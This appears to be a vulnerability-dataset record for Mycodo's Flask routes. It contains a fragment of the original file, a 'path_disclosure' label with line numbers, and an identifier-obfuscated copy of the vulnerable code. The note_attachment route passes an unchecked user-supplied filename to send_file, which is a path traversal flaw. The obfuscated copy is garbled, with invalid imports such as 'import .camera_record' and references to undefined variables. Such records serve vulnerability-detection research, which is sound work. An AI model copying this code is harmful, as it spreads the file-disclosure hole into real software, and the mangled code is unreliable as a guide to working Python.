'%Y-%m-%dT%H:%M:%S.%f')
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
logger.debug('Count = {}'.format(count_points))
logger.debug('Start = {}'.format(start))
logger.debug('End = {}'.format(end))
# How many seconds between the start and end period
time_difference_seconds = (end - start).total_seconds()
logger.debug('Difference seconds = {}'.format(time_difference_seconds))
# If there are more than 700 points in the time frame, we need to group
# data points into 700 groups with points averaged in each group.
if count_points > 700:
# Average period between input reads
seconds_per_point = time_difference_seconds / count_points
logger.debug('Seconds per point = {}'.format(seconds_per_point))
# How many seconds to group data points in
group_seconds = int(time_difference_seconds / 700)
logger.debug('Group seconds = {}'.format(group_seconds))
try:
query_str = query_string(
unit, device_id,
channel=channel,
value='MEAN',
start_str=start_str,
end_str=end_str,
group_sec=group_seconds)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
return jsonify(raw_data['series'][0]['values'])
except Exception as e:
logger.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
else:
try:
query_str = query_string(
unit, device_id,
channel=channel,
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
return jsonify(raw_data['series'][0]['values'])
except Exception as e:
logger.error("URL for 'async_usage' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/output_mod/<output_id>/<channel>/<state>/<output_type>/<amount>')
@flask_login.login_required
def output_mod(output_id, channel, state, output_type, amount):
""" Manipulate output (using non-unique ID) """
if not utils_general.user_has_permission('edit_controllers'):
return 'Insufficient user permissions to manipulate outputs'
if is_int(channel):
# if an integer was returned
output_channel = int(channel)
else:
# if a channel ID was returned
channel_dev = db_retrieve_table(OutputChannel).filter(
OutputChannel.unique_id == channel).first()
if channel_dev:
output_channel = channel_dev.channel
else:
return "Could not determine channel number from channel ID '{}'".format(channel)
daemon = DaemonControl()
if (state in ['on', 'off'] and str_is_float(amount) and
(
(output_type in ['sec', 'pwm'] and float(amount) >= 0) or
output_type == 'vol' or
output_type == 'value'
)):
out_status = daemon.output_on_off(
output_id,
state,
output_type=output_type,
amount=float(amount),
output_channel=output_channel)
if out_status[0]:
return 'ERROR: {}'.format(out_status[1])
else:
return 'SUCCESS: {}'.format(out_status[1])
else:
return 'ERROR: unknown parameters: ' \
'output_id: {}, channel: {}, state: {}, output_type: {}, amount: {}'.format(
output_id, channel, state, output_type, amount)
@blueprint.route('/daemonactive')
@flask_login.login_required
def daemon_active():
"""Return 'alive' if the daemon is running"""
try:
control = DaemonControl()
return control.daemon_status()
except Exception as e:
logger.error("URL for 'daemon_active' raised and error: "
"{err}".format(err=e))
return '0'
@blueprint.route('/systemctl/<action>')
@flask_login.login_required
def computer_command(action):
"""Execute one of several commands as root"""
if not utils_general.user_has_permission('edit_settings'):
return redirect(url_for('routes_general.home'))
try:
if action not in ['restart', 'shutdown', 'daemon_restart', 'frontend_reload']:
flash("Unrecognized command: {action}".format(
action=action), "success")
return redirect('/settings')
if DOCKER_CONTAINER:
if action == 'daemon_restart':
control = DaemonControl()
control.terminate_daemon()
flash(gettext("Command to restart the daemon sent"), "success")
elif action == 'frontend_reload':
subprocess.Popen('docker restart mycodo_flask 2>&1', shell=True)
flash(gettext("Command to reload the frontend sent"), "success")
else:
cmd = '{path}/mycodo/scripts/mycodo_wrapper {action} 2>&1'.format(
path=INSTALL_DIRECTORY, action=action)
subprocess.Popen(cmd, shell=True)
if action == 'restart':
flash(gettext("System rebooting in 10 seconds"), "success")
elif action == 'shutdown':
flash(gettext("System shutting down in 10 seconds"), "success")
elif action == 'daemon_restart':
flash(gettext("Command to restart the daemon sent"), "success")
elif action == 'frontend_reload':
flash(gettext("Command to reload the frontend sent"), "success")
return redirect('/settings')
except Exception as e:
logger.error("System command '{cmd}' raised and error: "
"{err}".format(cmd=action, err=e))
flash("System command '{cmd}' raised and error: "
"{err}".format(cmd=action, err=e), "error")
return redirect(url_for('routes_general.home'))
#
# PID Dashboard object routes
#
def return_point_timestamp(dev_id, unit, period, measurement=None, channel=None):
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
query_str = query_string(
unit,
dev_id,
measure=measurement,
channel=channel,
value='LAST',
past_sec=period)
if query_str == 1:
return [None, None]
try:
raw_data = dbcon.query(query_str).raw
number = len(raw_data['series'][0]['values'])
time_raw = raw_data['series'][0]['values'][number - 1][0]
value = raw_data['series'][0]['values'][number - 1][1]
value = '{:.3f}'.format(float(value))
# Convert date-time to epoch (potential bottleneck for data)
dt = date_parse(time_raw)
timestamp = calendar.timegm(dt.timetuple()) * 1000
return [timestamp, value]
except KeyError:
return [None, None]
except Exception:
return [None, None]
@blueprint.route('/last_pid/<pid_id>/<input_period>')
@flask_login.login_required
def last_data_pid(pid_id, input_period):
"""Return the most recent time and value from influxdb"""
if not str_is_float(input_period):
return '', 204
try:
pid = PID.query.filter(PID.unique_id == pid_id).first()
if len(pid.measurement.split(',')) == 2:
device_id = pid.measurement.split(',')[0]
measurement_id = pid.measurement.split(',')[1]
else:
device_id = None
measurement_id = None
actual_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
if actual_measurement:
actual_conversion = Conversion.query.filter(
Conversion.unique_id == actual_measurement.conversion_id).first()
else:
actual_conversion = None
(actual_channel,
actual_unit,
actual_measurement) = return_measurement_info(
actual_measurement, actual_conversion)
setpoint_unit = None
if pid and ',' in pid.measurement:
pid_measurement = pid.measurement.split(',')[1]
setpoint_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == pid_measurement).first()
if setpoint_measurement:
conversion = Conversion.query.filter(
Conversion.unique_id == setpoint_measurement.conversion_id).first()
_, setpoint_unit, _ = return_measurement_info(setpoint_measurement, conversion)
p_value = return_point_timestamp(
pid_id, 'pid_value', input_period, measurement='pid_p_value')
i_value = return_point_timestamp(
pid_id, 'pid_value', input_period, measurement='pid_i_value')
d_value = return_point_timestamp(
pid_id, 'pid_value', input_period, measurement='pid_d_value')
if None not in (p_value[1], i_value[1], d_value[1]):
pid_value = [p_value[0], '{:.3f}'.format(float(p_value[1]) + float(i_value[1]) + float(d_value[1]))]
else:
pid_value = None
setpoint_band = None
if pid.band:
try:
daemon = DaemonControl()
setpoint_band = daemon.pid_get(pid.unique_id, 'setpoint_band')
except:
logger.debug("Couldn't get setpoint")
live_data = {
'activated': pid.is_activated,
'paused': pid.is_paused,
'held': pid.is_held,
'setpoint': return_point_timestamp(
pid_id, setpoint_unit, input_period, channel=0),
'setpoint_band': setpoint_band,
'pid_p_value': p_value,
'pid_i_value': i_value,
'pid_d_value': d_value,
'pid_pid_value': pid_value,
'duration_time': return_point_timestamp(
pid_id, 's', input_period, measurement='duration_time'),
'duty_cycle': return_point_timestamp(
pid_id, 'percent', input_period, measurement='duty_cycle'),
'actual': return_point_timestamp(
device_id,
actual_unit,
input_period,
measurement=actual_measurement,
channel=actual_channel)
}
return jsonify(live_data)
except KeyError:
logger.debug("No Data returned form influxdb")
return '', 204
except Exception as e:
logger.exception("URL for 'last_pid' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/pid_mod_unique_id/<unique_id>/<state>')
@flask_login.login_required
def pid_mod_unique_id(unique_id, state):
""" Manipulate output (using unique ID) """
if not utils_general.user_has_permission('edit_controllers'):
return 'Insufficient user permissions to manipulate PID'
pid = PID.query.filter(PID.unique_id == unique_id).first()
daemon = DaemonControl()
if state == 'activate_pid':
pid.is_activated = True
pid.save()
_, return_str = daemon.controller_activate(pid.unique_id)
return return_str
elif state == 'deactivate_pid':
pid.is_activated = False
pid.is_paused = False
pid.is_held = False
pid.save()
_, return_str = daemon.controller_deactivate(pid.unique_id)
return return_str
elif state == 'pause_pid':
pid.is_paused = True
pid.save()
if pid.is_activated:
return_str = daemon.pid_pause(pid.unique_id)
else:
return_str = "PID Paused (Note: PID is not currently active)"
return return_str
elif state == 'hold_pid':
pid.is_held = True
pid.save()
if pid.is_activated:
return_str = daemon.pid_hold(pid.unique_id)
else:
return_str = "PID Held (Note: PID is not currently active)"
return return_str
elif state == 'resume_pid':
pid.is_held = False
pid.is_paused = False
pid.save()
if pid.is_activated:
return_str = daemon.pid_resume(pid.unique_id)
else:
return_str = "PID Resumed (Note: PID is not currently active)"
return return_str
elif 'set_setpoint_pid' in state:
pid.setpoint = state.split('|')[1]
pid.save()
if pid.is_activated:
return_str = daemon.pid_set(pid.unique_id, 'setpoint', float(state.split('|')[1]))
else:
return_str = "PID Setpoint changed (Note: PID is not currently active)"
return return_str
# import flask_login
# from mycodo.mycodo_flask.api import api
# @blueprint.route('/export_swagger')
# @flask_login.login_required
# def export_swagger():
# """Export swagger JSON to swagger.json file"""
# from mycodo.mycodo_flask.utils import utils_general
# import json
# if not utils_general.user_has_permission('view_settings'):
# return 'You do not have permission to access this.', 401
# with open("/home/pi/swagger.json", "w") as text_file:
# text_file.write(json.dumps(api.__schema__, indent=2))
# return 'success'
| path_disclosure | {
"code": [
" return send_file(file_path, as_attachment=True)",
" return send_file(path_file, mimetype='image/jpeg')"
],
"line_no": [
120,
152
]
} | {
"code": [
" if os.path.abspath(file_path).startswith(PATH_NOTE_ATTACHMENTS):",
" return send_file(file_path, as_attachment=True)",
" return send_file(path_file, mimetype='image/jpeg')"
],
"line_no": [
120,
121,
154
]
} |
import calendar
import datetime
import logging
import subprocess
import time
from importlib import import_module
import flask_login
import os
from dateutil.parser import parse as date_parse
from flask import Response
from flask import flash
from flask import jsonify
from flask import redirect
from flask import send_file
from flask import send_from_directory
from flask import url_for
from flask.blueprints import Blueprint
from flask_babel import gettext
from flask_limiter import Limiter
from influxdb import InfluxDBClient
from sqlalchemy import and_
from mycodo.config import DOCKER_CONTAINER
from mycodo.config import INFLUXDB_DATABASE
from mycodo.config import INFLUXDB_HOST
from mycodo.config import INFLUXDB_PASSWORD
from mycodo.config import INFLUXDB_PORT
from mycodo.config import INFLUXDB_USER
from mycodo.config import INSTALL_DIRECTORY
from mycodo.config import LOG_PATH
from mycodo.config import PATH_CAMERAS
from mycodo.config import PATH_NOTE_ATTACHMENTS
from mycodo.databases.models import Camera
from mycodo.databases.models import Conversion
from mycodo.databases.models import DeviceMeasurements
from mycodo.databases.models import Input
from mycodo.databases.models import Math
from mycodo.databases.models import NoteTags
from mycodo.databases.models import Notes
from mycodo.databases.models import Output
from mycodo.databases.models import OutputChannel
from mycodo.databases.models import PID
from mycodo.devices.camera import .camera_record
from mycodo.mycodo_client import DaemonControl
from mycodo.mycodo_flask.routes_authentication import clear_cookie_auth
from mycodo.mycodo_flask.utils import utils_general
from mycodo.mycodo_flask.utils.utils_general import get_ip_address
from mycodo.mycodo_flask.utils.utils_output import get_all_output_states
from mycodo.utils.database import db_retrieve_table
from mycodo.utils.image import .generate_thermal_image_from_pixels
from mycodo.utils.influx import influx_time_str_to_milliseconds
from mycodo.utils.influx import .query_string
from mycodo.utils.system_pi import assure_path_exists
from mycodo.utils.system_pi import is_int
from mycodo.utils.system_pi import return_measurement_info
from mycodo.utils.system_pi import str_is_float
VAR_0 = Blueprint('routes_general',
__name__,
static_folder='../static',
template_folder='../templates')
VAR_1 = logging.getLogger(__name__)
VAR_2 = Limiter(key_func=get_ip_address)
@VAR_0.route('/')
def FUNC_0():
try:
if flask_login.current_user.is_authenticated:
if flask_login.current_user.landing_page == 'live':
return redirect(url_for('routes_page.page_live'))
elif flask_login.current_user.landing_page == 'dashboard':
return redirect(url_for('routes_dashboard.page_dashboard_default'))
elif flask_login.current_user.landing_page == 'info':
return redirect(url_for('routes_page.page_info'))
return redirect(url_for('routes_page.page_live'))
except:
VAR_1.error("User may not be logged in. Clearing cookie auth.")
return clear_cookie_auth()
@VAR_0.route('/index_page')
def FUNC_1():
try:
if not flask_login.current_user.index_page:
return FUNC_0()
elif flask_login.current_user.index_page == 'landing':
return FUNC_0()
else:
if flask_login.current_user.is_authenticated:
if flask_login.current_user.index_page == 'live':
return redirect(url_for('routes_page.page_live'))
elif flask_login.current_user.index_page == 'dashboard':
return redirect(url_for('routes_dashboard.page_dashboard_default'))
elif flask_login.current_user.index_page == 'info':
return redirect(url_for('routes_page.page_info'))
return redirect(url_for('routes_page.page_live'))
except:
VAR_1.error("User may not be logged in. Clearing cookie auth.")
return clear_cookie_auth()
@VAR_0.route('/settings', methods=('GET', 'POST'))
@flask_login.login_required
def FUNC_2():
return redirect('settings/general')
@VAR_0.route('/note_attachment/<VAR_3>')
@flask_login.login_required
def FUNC_3(VAR_3):
VAR_32 = os.path.join(PATH_NOTE_ATTACHMENTS, VAR_3)
if VAR_32 is not None:
try:
return send_file(VAR_32, as_attachment=True)
except Exception:
VAR_1.exception("Send note attachment")
@VAR_0.route('/VAR_8/<VAR_4>/<VAR_5>/<VAR_3>')
@flask_login.login_required
def FUNC_4(VAR_4, VAR_5, VAR_3):
VAR_8 = Camera.query.filter(Camera.unique_id == VAR_4).first()
VAR_33 = assure_path_exists(
os.path.join(PATH_CAMERAS, '{uid}'.format(uid=VAR_8.unique_id)))
if VAR_5 == 'still':
if VAR_8.path_still:
VAR_34 = VAR_8.path_still
else:
VAR_34 = os.path.join(VAR_33, VAR_5)
elif VAR_5 == 'timelapse':
if VAR_8.path_timelapse:
VAR_34 = VAR_8.path_timelapse
else:
VAR_34 = os.path.join(VAR_33, VAR_5)
else:
return "Unknown Image Type"
if os.path.isdir(VAR_34):
VAR_71 = (files for VAR_71 in os.listdir(VAR_34)
if os.path.isfile(os.path.join(VAR_34, VAR_71)))
else:
VAR_71 = []
if VAR_3 in VAR_71:
VAR_46 = os.path.join(VAR_34, VAR_3)
return send_file(VAR_46, mimetype='image/jpeg')
return "Image not found"
@VAR_0.route('/camera_acquire_image/<VAR_6>/<VAR_4>/<VAR_7>')
@flask_login.login_required
def FUNC_5(VAR_6, VAR_4, VAR_7):
if VAR_6 == 'new':
VAR_72 = None
elif VAR_6 == 'tmp':
VAR_72 = '{id}_tmp.jpg'.format(id=VAR_4)
else:
return
VAR_34, VAR_3 = camera_record('photo', VAR_4, VAR_72=tmp_filename)
VAR_35 = os.path.join(VAR_34, VAR_3)
VAR_36 = datetime.datetime.now() - datetime.timedelta(seconds=int(VAR_7))
VAR_16 = os.path.getctime(VAR_35)
if datetime.datetime.fromtimestamp(VAR_16) > VAR_36:
VAR_73 = datetime.datetime.fromtimestamp(VAR_16).strftime('%Y-%m-%d %H:%M:%S')
VAR_74 = '["{}","{}"]'.format(VAR_3, VAR_73)
else:
VAR_74 = '["max_age_exceeded"]'
return Response(VAR_74, mimetype='text/json')
@VAR_0.route('/camera_latest_timelapse/<VAR_4>/<VAR_7>')
@flask_login.login_required
def FUNC_6(VAR_4, VAR_7):
VAR_8 = Camera.query.filter(
Camera.unique_id == VAR_4).first()
VAR_37, VAR_38 = utils_general.get_camera_paths(VAR_8)
VAR_39 = os.path.join(VAR_38, str(VAR_8.timelapse_last_file))
if VAR_8.timelapse_last_file is not None and os.path.exists(VAR_39):
VAR_36 = datetime.datetime.now() - datetime.timedelta(seconds=int(VAR_7))
if datetime.datetime.fromtimestamp(VAR_8.timelapse_last_ts) > VAR_36:
VAR_106 = datetime.datetime.fromtimestamp(VAR_8.timelapse_last_ts).strftime("%Y-%m-%d %H:%M:%S")
VAR_74 = '["{}","{}"]'.format(VAR_8.timelapse_last_file, VAR_106)
else:
VAR_74 = '["max_age_exceeded"]'
else:
VAR_74 = '["file_not_found"]'
return Response(VAR_74, mimetype='text/json')
def FUNC_7(VAR_8):
while True:
VAR_75 = VAR_8.get_frame()
yield (b'--VAR_75\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + VAR_75 + b'\r\n')
@VAR_0.route('/FUNC_8/<VAR_9>')
@flask_login.login_required
def FUNC_8(VAR_9):
VAR_40 = Camera.query.filter(Camera.unique_id == VAR_9).first()
VAR_41 = import_module('mycodo.mycodo_flask.camera.camera_' + VAR_40.library).Camera
VAR_41.set_camera_options(VAR_40)
return Response(FUNC_7(VAR_41(VAR_9=unique_id)),
mimetype='multipart/x-mixed-replace; boundary=frame')
@VAR_0.route('/outputstate')
@flask_login.login_required
def FUNC_9():
return jsonify(get_all_output_states())
@VAR_0.route('/outputstate_unique_id/<VAR_9>/<VAR_10>')
@flask_login.login_required
def FUNC_10(VAR_9, VAR_10):
VAR_22 = OutputChannel.query.filter(OutputChannel.unique_id == VAR_10).first()
VAR_42 = DaemonControl()
VAR_24 = VAR_42.output_state(VAR_9, VAR_22.channel)
return jsonify(VAR_24)
@VAR_0.route('/FUNC_11/<VAR_9>')
@flask_login.login_required
def FUNC_11(VAR_9):
VAR_42 = DaemonControl()
VAR_43 = VAR_42.widget_execute(VAR_9)
return jsonify(VAR_43)
@VAR_0.route('/time')
@flask_login.login_required
def FUNC_12():
return jsonify(datetime.datetime.now().strftime('%m/%d %H:%M'))
@VAR_0.route('/dl/<VAR_11>/<VAR_34:VAR_3>')
@flask_login.login_required
def FUNC_13(VAR_11, VAR_3):
if VAR_11 == 'log':
return send_from_directory(LOG_PATH, VAR_3, as_attachment=True)
return '', 204
@VAR_0.route('/last/<VAR_9>/<VAR_12>/<VAR_13>/<VAR_14>')
@flask_login.login_required
def FUNC_14(VAR_9, VAR_12, VAR_13, VAR_14):
if not str_is_float(VAR_14):
return '', 204
if VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
VAR_83 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
else:
return '', 204
if VAR_83:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_83.conversion_id).first()
else:
VAR_80 = None
VAR_22, VAR_21, VAR_29 = return_measurement_info(
VAR_83, VAR_80)
if hasattr(VAR_83, 'measurement_type') and VAR_83.measurement_type == 'setpoint':
VAR_107 = PID.query.filter(PID.unique_id == VAR_83.device_id).first()
if VAR_107 and ',' in VAR_107.measurement:
VAR_110 = VAR_107.measurement.split(',')[1]
VAR_111 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_110).first()
if VAR_111:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_111.conversion_id).first()
VAR_37, VAR_21, VAR_29 = return_measurement_info(VAR_111, VAR_80)
try:
if VAR_14 != '0':
VAR_61 = query_string(
VAR_21, VAR_9,
VAR_83=VAR_29, VAR_22=channel,
VAR_94='LAST', past_sec=VAR_14)
else:
VAR_61 = query_string(
VAR_21, VAR_9,
VAR_83=VAR_29, VAR_22=channel,
VAR_94='LAST')
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_92 = len(VAR_62['series'][0]['values'])
VAR_93 = VAR_62['series'][0]['values'][VAR_92 - 1][0]
VAR_94 = VAR_62['series'][0]['values'][VAR_92 - 1][1]
VAR_94 = float(VAR_94)
VAR_95 = date_parse(VAR_93)
VAR_16 = calendar.timegm(VAR_95.timetuple()) * 1000
VAR_104 = '[{},{}]'.format(VAR_16, VAR_94)
return Response(VAR_104, mimetype='text/json')
except KeyError:
VAR_1.debug("No Data returned form influxdb")
return '', 204
except IndexError:
VAR_1.debug("No Data returned form influxdb")
return '', 204
except Exception as e:
VAR_1.exception("URL for 'last_data' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/past/<VAR_9>/<VAR_12>/<VAR_13>/<VAR_15>')
@flask_login.login_required
def FUNC_15(VAR_9, VAR_12, VAR_13, VAR_15):
if not str_is_float(VAR_15):
return '', 204
if VAR_12 == 'tag':
VAR_76 = []
VAR_77 = NoteTags.query.filter(NoteTags.unique_id == VAR_9).first()
VAR_78 = Notes.query.filter(
Notes.date_time >= (datetime.datetime.utcnow() - datetime.timedelta(seconds=int(VAR_15)))).all()
for each_note in VAR_78:
if VAR_77.unique_id in each_note.tags.split(','):
VAR_76.append(
[each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
if VAR_76:
return jsonify(VAR_76)
else:
return '', 204
elif VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
VAR_83 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
else:
VAR_83 = None
if not VAR_83:
return "Could not find measurement"
if VAR_83:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_83.conversion_id).first()
else:
VAR_80 = None
VAR_22, VAR_21, VAR_29 = return_measurement_info(
VAR_83, VAR_80)
if hasattr(VAR_83, 'measurement_type') and VAR_83.measurement_type == 'setpoint':
VAR_107 = PID.query.filter(PID.unique_id == VAR_83.device_id).first()
if VAR_107 and ',' in VAR_107.measurement:
VAR_110 = VAR_107.measurement.split(',')[1]
VAR_111 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_110).first()
if VAR_111:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_111.conversion_id).first()
VAR_37, VAR_21, VAR_29 = return_measurement_info(VAR_111, VAR_80)
try:
VAR_61 = query_string(
VAR_21, VAR_9,
VAR_83=VAR_29,
VAR_22=channel,
past_sec=VAR_15)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
if 'series' in VAR_62 and VAR_62['series']:
return jsonify(VAR_62['series'][0]['values'])
else:
return '', 204
except Exception as e:
VAR_1.debug("URL for 'past_data' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/generate_thermal_image/<VAR_9>/<VAR_16>')
@flask_login.login_required
def FUNC_16(VAR_9, VAR_16):
VAR_44 = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
VAR_33 = assure_path_exists(
os.path.join(PATH_CAMERAS, '{uid}'.format(uid=VAR_9)))
VAR_3 = 'Still-{uid}-{VAR_106}.jpg'.format(
uid=VAR_9,
VAR_106=VAR_44).replace(" ", "_")
VAR_45 = assure_path_exists(os.path.join(VAR_33, 'thermal'))
assure_path_exists(VAR_45)
VAR_46 = os.path.join(VAR_45, VAR_3)
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
VAR_48 = Input.query.filter(Input.unique_id == VAR_9).first()
VAR_49 = []
VAR_50 = True
VAR_51 = int(int(VAR_16) / 1000.0) # Round down
VAR_52 = VAR_51 + 1 # Round up
VAR_53 = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(VAR_51))
VAR_54 = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(VAR_52))
for each_channel in range(VAR_48.channels):
VAR_29 = 'channel_{chan}'.format(
chan=each_channel)
VAR_61 = query_string(VAR_29, VAR_9,
VAR_59=VAR_53,
VAR_60=VAR_54)
if VAR_61 == 1:
VAR_1.error('Invalid query string')
VAR_50 = False
else:
VAR_62 = VAR_47.query(VAR_61).raw
if not VAR_62 or 'series' not in VAR_62 or not VAR_62['series']:
VAR_1.error('No measurements to export in this time period')
VAR_50 = False
else:
VAR_49.append(VAR_62['series'][0]['values'][0][1])
if VAR_50:
generate_thermal_image_from_pixels(VAR_49, 8, 8, VAR_46)
return send_file(VAR_46, mimetype='image/jpeg')
else:
return "Could not generate image"
@VAR_0.route('/FUNC_17/<VAR_9>/<VAR_13>/<VAR_17>/<VAR_18>')
@flask_login.login_required
def FUNC_17(VAR_9, VAR_13, VAR_17, VAR_18):
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE, timeout=100)
VAR_55 = Output.query.filter(Output.unique_id == VAR_9).first()
VAR_48 = Input.query.filter(Input.unique_id == VAR_9).first()
VAR_56 = Math.query.filter(Math.unique_id == VAR_9).first()
if VAR_55:
VAR_79 = VAR_55.name
elif VAR_48:
VAR_79 = VAR_48.name
elif VAR_56:
VAR_79 = VAR_56.name
else:
VAR_79 = None
VAR_57 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
if VAR_57:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_57.conversion_id).first()
else:
VAR_80 = None
VAR_22, VAR_21, VAR_29 = return_measurement_info(
VAR_57, VAR_80)
VAR_58 = datetime.datetime.utcnow() - datetime.datetime.now()
VAR_51 = datetime.datetime.fromtimestamp(float(VAR_17))
VAR_51 += VAR_58
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.fromtimestamp(float(VAR_18))
VAR_52 += VAR_58
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_9,
VAR_83=VAR_29, VAR_22=channel,
VAR_59=start_str, VAR_60=end_str)
if VAR_61 == 1:
flash('Invalid query string', 'error')
return redirect(url_for('routes_page.page_export'))
VAR_62 = VAR_47.query(VAR_61).raw
if not VAR_62 or 'series' not in VAR_62 or not VAR_62['series']:
flash('No measurements to export in this time period', 'error')
return redirect(url_for('routes_page.page_export'))
VAR_63 = 'timestamp (UTC)'
VAR_64 = '{VAR_79} {meas} ({id})'.format(
VAR_79=name, meas=VAR_29, id=VAR_9)
VAR_65 = '{id}VAR_37{VAR_79}VAR_37{meas}.csv'.format(
id=VAR_9, VAR_79=name, meas=VAR_29)
import csv
from io import StringIO
def FUNC_26(VAR_66):
VAR_81 = StringIO()
VAR_82 = csv.writer(VAR_81)
VAR_82.writerow([VAR_63, VAR_64])
for csv_line in VAR_66:
VAR_82.writerow([
str(csv_line[0][:-4]).replace('T', ' '),
csv_line[1]
])
VAR_81.seek(0)
yield VAR_81.read()
VAR_81.truncate(0)
VAR_81.seek(0)
VAR_67 = Response(FUNC_26(VAR_62['series'][0]['values']), mimetype='text/csv')
VAR_67.headers['Content-Disposition'] = 'attachment; VAR_3="{}"'.format(VAR_65)
return VAR_67
@VAR_0.route('/async/<VAR_19>/<VAR_20>/<VAR_13>/<VAR_17>/<VAR_18>')
@flask_login.login_required
def FUNC_18(VAR_19, VAR_20, VAR_13, VAR_17, VAR_18):
if VAR_20 == 'tag':
VAR_76 = []
VAR_77 = NoteTags.query.filter(NoteTags.unique_id == VAR_19).first()
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
if VAR_18 == '0':
VAR_52 = datetime.datetime.utcnow()
else:
VAR_52 = datetime.datetime.utcfromtimestamp(float(VAR_18))
VAR_78 = Notes.query.filter(
and_(Notes.date_time >= VAR_51, Notes.date_time <= VAR_52)).all()
for each_note in VAR_78:
if VAR_77.unique_id in each_note.tags.split(','):
VAR_76.append(
[each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
if VAR_76:
return jsonify(VAR_76)
else:
return '', 204
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if VAR_20 in ['input', 'math', 'function', 'output', 'pid']:
VAR_83 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
else:
VAR_83 = None
if not VAR_83:
return "Could not find measurement"
if VAR_83:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_83.conversion_id).first()
else:
VAR_80 = None
VAR_22, VAR_21, VAR_29 = return_measurement_info(
VAR_83, VAR_80)
if VAR_17 == '0' and VAR_18 == '0':
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='COUNT')
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_84 = VAR_62['series'][0]['values'][0][1]
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_87 = VAR_62['series'][0]['values'][0][0]
except:
return '', 204
VAR_52 = datetime.datetime.utcnow()
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
elif VAR_17 != '0' and VAR_18 == '0':
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.utcnow()
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='COUNT',
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_84 = VAR_62['series'][0]['values'][0][1]
except:
return '', 204
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_87 = VAR_62['series'][0]['values'][0][0]
except:
return '', 204
else:
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.utcfromtimestamp(float(VAR_18))
